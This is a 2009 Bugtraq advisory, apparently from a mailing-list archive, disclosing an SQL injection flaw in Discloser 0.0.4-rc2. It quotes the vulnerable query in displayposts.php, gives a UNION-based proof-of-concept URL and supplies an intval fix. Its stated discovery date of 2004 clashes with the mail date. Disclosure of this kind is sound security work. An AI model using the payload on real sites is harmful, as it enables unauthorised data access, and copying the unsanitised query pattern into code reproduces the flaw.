[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Discloser 0.0.4-rc2 SQL Injection Vulnerability
- To: str0ke <milw0rm@xxxxxxxxx>, Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: Discloser 0.0.4-rc2 SQL Injection Vulnerability
- From: Salvatore Fresta aka Drosophila <drosophilaxxx@xxxxxxxxx>
- Date: Mon, 3 Aug 2009 11:27:02 +0200
--
Salvatore Fresta aka drosophila
CWNP444351
******** Salvatore "drosophila" Fresta ********
[+] Application: Discloser
[+] Version: 0.0.4-rc2
[+] Website: http://discloser.sourceforge.net/
[+] Bugs: [A] SQL Injection
[+] Exploitation: Remote
[+] Date: 21 Feb 2004
[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com
***************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
***************************************************
[+] Bugs
- [A] SQL Injection
[-] Risk: medium
[-] File affected: displayposts.php
This flaw allows a guest to insert arbitrary SQL
statments in the affected query.
...
if (isset($_GET['more'])) {
$more = $_GET['more'];
$query = mysql_query("select ". $tableprefix ."posts.*,
". $tableprefix ."users.username, ". $tableprefix ."users.email from ".
$tableprefix ."posts, ". $tableprefix ."users where ". $tableprefix
."posts.poster = ". $tableprefix ."users.username and ". $tableprefix
."posts.id = $more");
...
***************************************************
[+] Code
- [A] SQL Injection
You can retrieve information from 3,4,7,8 fields.
http://www.site.com/path/index.php?more=-1 UNION ALL SELECT
1,'long',3,4,5,6,7,8,9,10
***************************************************
[+] Fix
To fix the flaw, you must to accept numeric content
only, using, for example, intval PHP function:
$more = intval($_GET['more']);
***************************************************